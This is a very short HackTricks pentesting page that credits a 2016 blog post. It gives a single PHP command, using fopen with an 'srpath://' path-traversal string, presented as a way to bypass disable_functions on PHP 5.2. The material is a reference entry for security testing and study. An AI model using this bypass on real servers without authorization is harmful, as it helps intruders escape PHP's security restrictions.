hacktricks/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md
2020-11-15 01:09:32 +00:00

294 B

disable_functions bypass - PHP 5.2 - FOpen Exploit

PHP 5.2 - FOpen Exploit

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");'